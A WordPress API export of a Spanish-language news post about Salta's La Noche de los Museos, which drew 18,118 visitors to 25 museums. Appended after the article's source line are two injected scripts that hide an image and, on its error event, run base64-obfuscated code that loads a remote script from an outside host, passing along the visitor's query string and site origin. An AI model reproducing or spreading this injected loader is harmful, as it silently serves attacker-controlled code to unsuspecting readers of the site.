{"id":1971,"date":"2022-12-19T11:15:59","date_gmt":"2022-12-19T14:15:59","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1971"},"modified":"2025-08-14T00:27:33","modified_gmt":"2025-08-14T03:27:33","slug":"la-noche-de-los-museos-recibio-18-118-visitantes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1971","title":{"rendered":"La Noche de los Museos recibi\u00f3 18.118 visitantes"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#6c5104\"><em>M\u00e1s de 18 mil salte\u00f1os, salte\u00f1as y turistas dijeron s\u00ed a la propuesta de La Noche de los Museos y participaron de diferentes actividades en las 25 instituciones adheridas de toda la provincia.<\/em><\/h4>\n\n\n\n<p>La Noche de los Museos se trat\u00f3 de una jornada de celebraci\u00f3n que incluy\u00f3, como una de las actividades centrales, la entrega de premios del XLII Sal\u00f3n Provincial de Artes Visuales en el Museo de Bellas Artes, encabezada por el Secretario de Cultura de la Provincia,&nbsp;<strong>Diego Ashur<\/strong>.<\/p>\n\n\n\n<p>Por convocatoria del Gobierno de la Provincia de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y la Subsecretar\u00eda de Patrimonio Cultural, 25 museos y espacios culturales provinciales, nacionales, municipales y privados, se sumaron a este evento que cont\u00f3 con m\u00e1s de 50 actividades destinadas a toda la familia convocando a 18118 visitantes.<\/p>\n\n\n\n<p>Adem\u00e1s de la entrega de premios a los artistas ganadores del Sal\u00f3n, se inaugur\u00f3 en Explora Salta una muestra que homenajea a los 4 premios Konex salte\u00f1os en el rubro Artes Visuales: Francisco G\u00f3mez Paz, Esteban Alavarez, Guido Yannitto y estudio CCFGM Arquitectos Asociados. En los dem\u00e1s museos, hubo tambi\u00e9n visitas guiadas especiales, espect\u00e1culos de m\u00fasica y danza, degustaci\u00f3n de gastronom\u00eda y cerveza artesanal, ferias de arte, concurso y desfile de cosplay y de trajes de \u00e9poca, charlas y proyecci\u00f3n de audiovisuales entre muchas otras cosas.<\/p>\n\n\n\n<p>Los museos abrieron sus puertas de 18 a 24, horario en que p\u00fablico de todas las edades poblaron sus salas consultando la programaci\u00f3n en sus celulares, para no perderse sus opciones preferidas.<\/p>\n\n\n\n<p>El secretario de Cultura, Diego Ashur, manifest\u00f3: \u00abcelebramos la afluencia del p\u00fablico que se renueva e intensifica cada a\u00f1o, y resaltamos la labor de todos los museos adheridos. Estos espacios culturales permiten entender y vivenciar el patrimonio cultural,&nbsp; aprender de \u00e9l, cuidarlo y preservarlo para el futuro\u00bb.<\/p>\n\n\n\n<p>A lo largo de los a\u00f1os, y gracias al trabajo y compromiso sostenidos en el \u00e1mbito del patrimonio cultural, tanto el D\u00eda Internacional de los Museos como La Noche de los Museos, se han instalado en la agenda anual de los salte\u00f1os y salte\u00f1as, integr\u00e1ndolos y poniendo a su alcance todos los espacios culturales.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>M\u00e1s de 18 mil salte\u00f1os, salte\u00f1as y turistas dijeron s\u00ed a la propuesta de La Noche de los Museos y participaron de diferentes actividades en las 25 instituciones adheridas de toda la provincia. La Noche de los Museos se trat\u00f3 de una jornada de celebraci\u00f3n que incluy\u00f3, como una de las actividades centrales, la entrega [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1972,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-1971","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1971"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1971"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1971\/revisions"}],"predecessor-version":[{"id":7237,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1971\/revisions\/7237"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1972"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}